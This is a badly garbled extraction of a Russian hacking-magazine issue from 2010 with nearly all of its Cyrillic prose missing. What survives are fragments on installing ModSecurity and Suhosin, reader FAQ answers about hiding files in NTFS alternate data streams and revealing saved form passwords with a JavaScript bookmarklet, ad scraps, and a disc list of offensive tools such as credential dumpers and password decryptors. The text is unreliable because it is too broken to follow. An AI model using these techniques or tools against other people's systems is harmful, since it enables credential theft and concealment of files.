, HTML-
(Content Injection),
( @verifyCC), XSS
PDF-. :
skipAfter, SecMarker, ctl:ruleRemoveById (
), GEO
, SecRuleScript, Lua. ,
rules-updater.pl,
.


Zorp

Syslog-NG,
(Balazs Scheidler), Zorp.
. Netfilter/iptables, Zorp , ,
. Zorp GPL (www.balabit.com)
GNU GPL.

GreenSQL

128

X 12 /143/ 10

Suhosin

ModSecurity .
Ubuntu:
$ sudo apt-cache search libapache-mod-security
| grep -i version
Version: 2.5.11-1

, , :
$ sudo apt-get install libapache-mod-security

,
, Debian, RHEL/CentOS, Fedora, Gentoo,
FreeBSD, Apache Windows . , ,
.

, . :
$ sudo apt-get build-dep libapache-modsecurity

ModSecurity unique-id,
Ubuntu :
$ sudo a2enmod unique_id

Apache - --enable-uniqueid --with-pcre. :


$ tar tar xzvf modsecurity-apache_2.5.12.tar.
gz
$ cd modsecurity-apache_2.5.12/apache2
$ ./configure

apxs (APache eXtenSion tool),


:
$ make
$ make test
All tests passed (576).
X 12 /143/ 10

Suhosin


ModSecurity Log Collector, make mlogc. :

INFO

$ sudo make install


:
$ sudo chmod 644 /usr/lib/apache2/modules/
mod_security2.so

-, :

info

AppArmor, SELinux
TOMOYO Linux

][ 08.2010

$ sudo nano /etc/apache2/apache2.conf


LoadFile /usr/lib/libxml2.so
LoadFile /usr/lib/liblua5.1.so
LoadModule security2_module modules/mod_
security2.so


ModSecurity.
,
, :
$ sudo cp modsecurity-apache_2.5.12/
modsecurity.conf-minimal /etc/apache2/mod_
security.conf


. ,
. ModSecurity
(modsecurity.org/documentation/modsecurityapache/2.5.12).
ModSecurity CRS,
OWASP ( 2.0.8, CVS). , , CRS base_rules

129

SYN/ACK

ModSecurity
optional_rules. /etc/apache2/
modsecurity :
$ sudo mkdir /etc/apache2/modsecurity
$ tar xzvf modsecurity-crs_2.0.8.tar.gz
$ sudo mv -v modsecurity-crs_2.0.8/* /etc/apache2/
modsecurity/

:
$ sudo nano /etc/apache2/apache2.conf
<IfModule security2_module>
Include modsecurity/*.conf
Include modsecurity/base_rules/*.conf
#
Include modsecurity/optional_rules/*.conf
</IfModule>

modsecurity_crs_10_config.conf,
ModSecurity, ;
,
, .
.
:
$ sudo service apache2 start

.
MosSecurity , ,
.

Suhosin PHP

, PHP
-,
. , , ,

. ,
: suPHP, htscanner Suhosin. suPHP
(suphp.org) Apache (mod_suphp)
PHP, PHP-
. htscanner (pecl.php.net/package/htscanner)
,
htaccess. , , Suhosin (hardened-php.net/suhosin),

130

GreenSQL

,
, include (
realpath SQL
).
Feature List (hardened-php.net/
suhosin/a_feature_list.html).
Suhosin ,
.
PHP,
(Engine Protection).
Suhosin-, PHP.
PHP . Ubuntu
10.04:
$ sudo apt-get install php5-cli
$ php -v
PHP 5.3.2-1ubuntu4.5 with Suhosin-Patch (cli) (built:
Sep 17 2010 13:49:46)

, PHP Suhosin. ,
PHP suhosin.so, PHP.
,
. ,
/. Ubuntu
.
$ sudo apt-get install php5-suhosin


/etc/php5/conf.d/suhosin.ini. , ,
, . man-
Configuration (hardened-php.net/suhosin/configuration.
html).

-, , . ,
,
! z
X 12 /143/ 10

UNITS

Oriyana oriyana@xpsycho.ru, Andrushock andrushock@real.xakep.ru

PSYCHO:

M EGA FAQ M I N DF UC K

, , , , ][
, , , , ; .

, ,
, .
,
.
, 50
,
15-20 ,
, . . ,
, ,
; ,
! ,
. ,
,
, , .
.

Q:
?
:
.
,

, , ,

132



; ,
, , -

. , ,
,

,
(
),

. .

Q: ,
?
A: , , ,
, ,
.
,
, ,
.
: =
,
(
). , , ,

, .
, -

,
,
, . ,
: , ,
,
,
, . ?

( , , ,
, ,
),
; , ,
, .
,

.
, - (
),
- ,
,
.

Q:
?
A:
,
, ( ).
:
.
, , ,
- ,
X 12 /143/ 10

MegaFAQ mindFUCK: ,
. .
: ?.
,

, ,

.
;
.
, ,
- ;
, ,

/,
;

,
..;
.

.
?,
,
.
, ,
. ,
, :
, , . ,
,

.
. .
, ,
,
, , ,


;
X 12 /143/ 10

(

). e-mail,
,
,
, ,
. : 50%
,
;
,
,
5-10
.

Q: ,
?
A:
,

,
:

: , , , , ?

?
?
- ?
, ?
?
,
?
: , , ?

,
?

, ?

Q: .
?
A: ,
( ):
1. .

, .
,
. :
, .
, ,
. .
2. .

,
. ,
,
. , , ,


,
,
.
,
, .

Q: ? ?

133

UNITS

A: , :
1. .

, ,
,

, ,
- . ,
, ,
.
2. .
,

, .
,
,

: ?. ;

.
3. .
(, )
.
, ,
,
. ,

,
.

, ,
-
.
4. .
, ?
,
.
,
,
:
,
, ,

.
5. !
, ,
, ,
-
. , ?
, , .
-

134

-
, .
,
, ,
() .

. ,
,
,
:
,
,
,
, ?
,
.
6. .
- : , , ,
. ,
, , ,
,
, .

Q: ,
?

A: , -
, ,
. ,
, ,
.
.
1. :
, ;
;
;
, .
:

;

(
),
, ;
:
, . ,
?.
2. :
(, ,
);
X 12 /143/ 10

,
,
.
:
,
,
, ,
,
-
. ,

, ,
,
.
,
25- ,
- .

;
;
,
.
:
,
;
;
- ,
.
3. :
;

;
.
:
,
:
. , , .
4. :
;
, ;
-, , .
:
:
,
.

,
.
X 12 /143/ 10

5. :
()
, .
:
( :
.
,
);
( ,

);


. ,
()
? ,
,
,
.
:
, , ,
,
, ,
,
.

Q:
,
() ,
5.1
. ?
A: ?
-
. .
,
,

,
.
, (16-100 ) ( ,
,
..), ,
,
. ,

.
.
Hint: ,
,
.

(, Soundcare SuperSpike 1) (
Furutech G-314Ag).

Q: ,
, .
?
A: , .

Q: .
?
A: ! , :

, :
,

( ) (,
).
/ ,

135

UNITS

. ,

(
).
?
.

.
.

Q: ?
A:

, ,


, ,
,
, ,
. ,
, () .
,
.
,

Q: , ,

?

136

A: . . DJ
,
,
.


.
. 30 1938
.


,
,
.
,

,

.
,
(
).

Q: ,
,

. ?
A:
.
,
,
.
,
, ,
. , ,


. ,

;
.
X 12 /143/ 10

Q: -
.

?
A: , . ,
, ,
,

!, , ,
- . ,
,
, ,
, , ,
( ,
, ).
: , ,
, .
(. ,

PR-
X 12 /143/ 10

][ 4 2010 ), , , -
. ,
-- ,
. , , , PR, .

Q: , .
?
A: , , .
,
? ,
.
,
?
(
, ),
, 80%
.
, ? . . ,

:
, 100% .

. ,
,
,
, , ,
,
. ,
,
,
, .
, , ,

, ,
,
, . ,
(
, , )
,
. , , ! , ,
][
:).z

137

!
800 !

8.5
DVD

191

2200 .
23% ,
( )

(250 )

30 ,
31 ,
31 .


+ DVD

DVD
+ DVD

Total Football
+ DVD

DVDXpert

+ DVD

Smoke

PC : DEAD SPACE 2

10

: 250

#10(82) 2010

DEAD
SPACE 2

. 36

BIOSHOCK INFINITE

+ DVD

. 90

. 44

DRAGON AGE 2

, RPG

MAFIA 2

PC
+ 2 DVD

Mountain Bike

Digital Photo
+ DVD

+ DVD

T3

Onboard

Ski Pass

! !
. 50

.
: 210

11 (142) 2010

HTML5?
. 26

ZEUS
METERPRETER
CHAOS CONSTRUCTIONS 2010:


CISCO



TCL
. 64


+ + 2 DVD: 162
( 35% , )
+

12 3890 (24 )
6 2205 (12 )

,
.

,

, :

!
1. ,
,
http://shop.glc.ru.
2. .
3.
:
subscribe@glc.ru;
(495) 780-88-24;
119021, , . ,
. 11, . 44, , .

72 000 QIWI
() .

!
.
,
. , ,
.
, .
( )


. .

6 c 1260 ( ).
6
R-kiosk , . , .27-31 648 .
,
.

(495)780-88-29 ( ) 8-800-200-3-999 ( ,
, ). , /
INFO@GLC.RU WWW.GLC.RU .

UNITS

faq
united?

faq@real.xakep.ru

Q:
, . -
,
?
A: ,
. , ,

. , ,
hex- Hiew.
,
Hiew . , *,
Alt+F3 (CryBlk).
.
, Hiew ,
Crypt commands
.
<F7>,
.
,

.
<Alt+F3>, <F9>.
XOR

140

.

Hiew .
<F3>, <F8>
.

Q: :
Linux
. .
A:
. aufs2. - .
,
.
(aufs.sourceforge.net)
userspace- .
:
(/media/torrents)

(/media/new_storage). ,
,
:
# sudo mount -t aufs none /media/
storage -o br:/media/torrents=rw:/
media/new_storage=rw,create=mfs,sum


:
br: 1=rw: 2=rw:
, , , ;
create=mfs , ,
,
; sum ,
df pydf

.
/etc/fstab :
none /media/storage aufs br:/
media/torrents=rw:/media/new_
storage=rw,create=mfs,sum 0 0


,
mhddfs,
, fuse.

:
# sudo mhddfs /media/torrents,/
media/new_storage /media/storage
-o default_permissions,allow_other


.
X 12 /143/ 10

,
SSL

Adminer phpMyAdmin

bash# ./gotssl.py google.com 443


-{ GotSSL? v0.1 }-

Q: DirectX. ,
.

,
.
?
?
A: ,
. ,
.
. ,
WinDbg.
, WinDbg . , . .server tcp:port=1111
( ).
. ,
, WinDbg, File
Connect to Remote Session...,
Connection String tcp:server=Server
,port=Socket, Server
, Socket
( 1111). ,

.

Q: -
URL,
-.
A:

Soft Hyphen (SHY). ,
, . HTML4

&shy;,
-.
X 12 /143/ 10

.
. &shy;,
. &shy;
URL-,
-. -
-
.

Q: phpMyAdmin.

MySQL ,
PHP-?
A: Adminer ( phpMinAdmin),
PHP
MySQL- .

PHP-,
. Adminer
,
phpMyAdmin. , ? :).
, www.adminer.org ,
PostgreSQL, SQLite, MS SQL Oracle.

Q: , - SSL?
A:
gotssl (mjc.me/?p=188).
,
socket. RFC
SSL Wireshark'
,
- SSL-.
,
SSLv2 Client Hello data
TLS- .
gotssl :

[*] Checking for SSL on google.


com:443
[!] Yes! google.com:443 does
GotSSL.

Q: (
). ?
A:
, .

JS-,
, *.
,
- . , , ,

:
javascript:(function(){var
s,F,j,f,i; s = ""; F = document.
forms; for(j=0; j<F.length; ++j) {
f = F[j]; for (i=0; i<f.length; ++i)
{ if (f[i].type.toLowerCase() ==
"password") s += f[i].value + "n";
} } if (s) alert("<span id="IL_AD7"
class="IL_AD">Passwords</span> in
forms on this page:nn" + s); else
alert("There are no passwords in
forms on this page.");})();


, .

Q:
.
:
(OpenID, Facebook, Twitter ..)
/
. ?

141

UNITS

MustHave
SSD-
A:
,

(dvd.xakep.ru). ,
.
:
IntenseDebate (www.intensedebate.com)
DISUS Comments (disqus.com).

WordPress' ( )
-,
:
;
(/ );
;

(OpenID, Twitter ..).
:
,

.
, .
.
MySQL-,
- .
Intense Debate .

Q:
SATA-
SSD. , ,
.

. SSD -.
A: . ,
,

. ,
.

SSD-. ,

,
Windows.
, -

142

SSD Tweak Utility (www.


techspot.com/guides/246-ssd-performancetweak-utility).

.
(Use Large
System Cache),
8.3,
/
,
.
Intel
SSD Toolbox (www.intel.com/go/ssdtoolbox),

(
Intel) ( SSD
).

Q: Python . py2exe
py2app ,
.
pyinstaller,


Python.
A: cx_Freeze
(cx-freeze.sourceforge.net).
( pyinstaller),

Windows,
Linux-.
Windows
CentOS -, . cx_Freeze,
Python.

Windows. ,

.
?
A:
ExpanDrive (www.expandrive.com),
SFTP Drive.
Dokan
SSHFS (www.dokan-dev.net).
AnyClient,
FTP/S, SFTP WebDAV/S.


PyTTY. ,
(www.damtp.cam.
ac.uk/user/jp107/xp-remote/ssh-map).

Q: exe-,

NTFS (ADS)?
A:
start
wmic processs call create,
,
NFS.

Q:
NTFS. :
. ,
doc-
txt- Word.
?
A: Windows 7
.

NTFS:

Q: LiveCD-,

C:\temp>echo tst > maindoc.txt
( , ,
C:\temp>echo ads > maindoc.txt:ads.
), txt
? -

c:\temp\maindoc.
.
txt:ads.txt Word... .
, :
, Linux
.
C:\temp>mklink txtfile c:\temp\
A:
maindoc.txt:ads.txt
CloudUSB (www.cloudusb.net). Ubuntu ,
EncFS,
AES BlowFish. - (, ,
), CloudUSB
(
) Dropbox.
,
.

Q: :
( SSH)

symbolic link created for txtfile


<<===>> c:\temp\maindoc.txt:ads.
txt


,
(c:\temp\txtfile), , Word
.
, ,

exe.
start. ,
, , Windows 7.z
X 12 /143/ 10

>Security
DigsbyPasswordDecryptor
ESF
Firesheep 0.1
InMemoryFuzzer
ISR-evilgrade 2.0.0
Metasploit 3.5 Pro

>Devel
Argtable 2.12
Ccache 3.1
Cdoc 0.9.7
DbVisualizer 7.1.3
Distcc 3.1
Doxygen 1.7.2
Eric 5.0.3
Firebird 2.5
Jam 2.5
Jansson 1.3
KDbg 2.2.2
KDevelop 4.1
Kodos 2.4.9

>>UNIX
>Desktop
CherryTree 0.15
ChmSee 1.2.0
Cinelerra 4.2
Desktop Designer
Doodle 0.7.0
EveryGUI 0.99b
Furius ISO Mount 0.11.3.0
Gnac 0.2.2
Google Earth 5.2
KoolDock 0.3
Launchy 2.5
Lotus Symphony 3
Nevernote 0.92.1
Strigi 0.6.4
Tesseract 3.00
X-Tile 1.8.2
XNeur + gXNeur 0.10.0
Xwrits 2.26

>Security
Arachni 0.2
BeEF 0.4.1-alpha
EDB Linux Debugger
0.9.16
hashkill 0.2.3
ISR-evilgrade 2.0.0
Metasploit 3.5 Pro
Ninja
pwntooth 0.2.3
REMO 0.2.0
Rozorback 0.1.2
RSYaba
Sguil 0.7.0
sqlsus 0.5rc1
USBsploit 0.4 BETA
wifite
Aidsql
CryptCat 1.2.1
Ctrace 0.9
Dorkmaster 0.1
Doscan 0.3.1
Firesheep 0.1
HexInject 1.1
Hyenae 0.35.2
Iexploder 1.7.2
Logkeys 0.1.1a
Mandos 1.2.3
Publimark 0.1.4
Social-Engineer Toolkit
Sydbox 0.7.1
Tariq
THC-Hydra 5.8
USBsploit 0.3b
Zed Attack Proxy 1.0.0

>Net
ClipGrab 3.0.7.2
Corkscrew 2.0
Dante 1.2.2
Facebook Notifier 0.3
Google Chrome 7.0.517.41
Histwi 0.6.7
Licq 1.5.0
Minitube 1.2
Mozilla Firefox 3.6.12
OpenVerse 0.8.7
Opera 10.63
PenguinTV 4.1
qutIM 0.2.0
Remuco 0.9.3.1
Smuxi 0.8
Steadyflow 0.1.5
TooBars 1.11
Transmission 2.10

>Games
0 A.D. Alpha 2

LLVM 2.8
Mono 2.8
Snaked 0.3
Vala 0.11.0
Valgrind 3.6.0

>>MAC'
SweetFM 2.0.1
Quick Learner 0.5
Wall4iphone 1.0
Flock 3.0
Shrinkr 1.0
Disk Drill 1.0.52
GoodSync 1.5.5
RetroX 1.2
MenuWeather 3.0.1
Greenfoot 2.0
Raw Photo Processor 4.1.8
Cyberduck 3.6.1
TrailRunner 3
Editra 0.5.86
Iceberg 1.2.9

>X-distr
Ubuntu 10.10

>System
ATI Catalyst 10.10
Avfs 0.9.9
Batmon 0.5
Blocksshd 1.3
Bontmia 0.14
Boxbackup 0.10
Cdf 0.2
Clean 3.4
Dolly 0.57
duff 0.4
Linux Kernel 2.6.36
Mesa 7.9
q4wine 0.120
Scrub 2.2
VirtualBox 3.2.10
Wine 1.3.6

>Server
Apache 2.2.17
Asterisk 1.8
BFilter 1.1.4
BIND 9.7.2-P2
CUPS 1.4.4
DHCP 4.1.1
Feng Office 1.7.2
Kamailio 3.1.0
MySQL 5.1.51
OpenLDAP 2.4.23
OpenSSH 5.6
OpenVPN 2.1.3
pgAdmin 1.12
Postfix 2.7
PostgreSQL 9.0.1
Samba 3.5.6
Squid 3.1.9
Wzdftpd 0.8.3

>Net
digsby
FluffyApp 0.8.6
Googsystray 1.2.4
mIRC v7.14
Multi Uni-Uploader 2.5
Opera 11 alpha
SmartSniff 1.72
streamwriter

>Multimedia
AeroWeather
EasyMon!
Evernote 4.0.1
Google SketchUp 8
Grooveshark v1.1.1
iTunes 10.0.1
Microsoft Expression Encoder 4
MP3 Skype Recorder v.1.9.0
RadioSure 2.1.969
Winamp 5.58
Yawcam 0.3.3

>Misc
7Conifier 0.4 R3 BETA
Anki 1.0.1
AppAdmin v1.1.0
CinemaDrape 1.2
DeskHedron 1.0
Desktop Tray Launcher 1.2
exf 1.0.1.6
Hot Corners 2.2.2.0
HotKeyMan 1.0.3
iQ-Notes 5.02
Lexiconer
Quick Cliq 1.0.3.8
RT Windows 7 Registry Tweaker v2.1
TimeFlow 0.04
UNetbootin
WinAudit Freeware v2.28.2

>Games
XMoto 0.5.3

>System
Action(s)
Aerofoil 1.5.1
CCleaner 3.0
DriveGleam
EasyBCD 2.0.2
ExactFile 1.0.0.15
Explorer++ 1.2
InjuredPixels 2.1
Intel Data Migration
Ketarin 1.5.0
MyDefragPowerGUI 1.0.2
P2 eXplorer
Rohos Mini Drive
SSD Tweaker 1.6.5
UsbDummyProtect 1.1

NirCmd v2.45
NSDECODER 1.0
OracleEnumerator v1.1.1
PaltalkPasswordDecryptor
PuzlBox
SDL Regex Fuzzer
setdllcharacteristics
TrillianPasswordDecryptor
Windows Credentials Editor 1.0
Windows Credentials Editor v1.0
(WCE)

0d

12(143) 2010

>>WINDOWS
>Development
cx_Freeze
DbVisualizer 7.1.3
Doxygen 1.7.2
Firebird 2.5.0
IronPython 2.6.2
IronRuby 1.1.1
kodos 2.4.9
PyCharm 1.0
Rad Software Regular Expression
Designer 1.4
Verych's Regular Expression Editor
x 12 (143) 2010
143

MAC OS X IPHONE

. 48

WINDOWS



: 2
10
.

. 96


OBJECTIVE-C

C. 62

,
?

HTML5
VIRTUALBOX TIPSNTRICKS
.NET
WIN32.WHISTLER

12 (143) 2010

DIGITAL FORENSIC: . 34

UNITS

HTTP://WWW2
How-to


HTML5

INSTRUCTABLES
www.Instructables.com

THE
HTML5 TEST
www.html5test.com

.
How-to. RFID-?
? ?

?
?
? , - ? How-to ,
Instructables. !


, HTML5.
-
-, canvas video, storage (
), .
, Firefox, Opera,
, . . -
-, ,
. 300 ,
. Google Chrome 217.


,
-,


,
donate

THECOMMENTOR
www.thecommentor.com

FLATTR
www.flattr.com

][
: , -
, .
:
, , .
. (JPG,
GIF, PNG, TIFF, PSD, BMP, PDF), ,
, ,
. , 15 ,
:).

Like Facebook,
, .

, .
: (
) .
Flattr . flattr
- , donate ,
.
. ,
. ,
- ,
.

144

X 12 /143/ 10

>> coding

3 -
QIWI ():
3 000 , 2 000
1 000 QIWI
QIWI Visa Virtual *.

* QIWI Visa Virtual


-,
Visa.
100
000 QIWI (), QIWI
www.qiwi.ru .

, ?
?
. -
.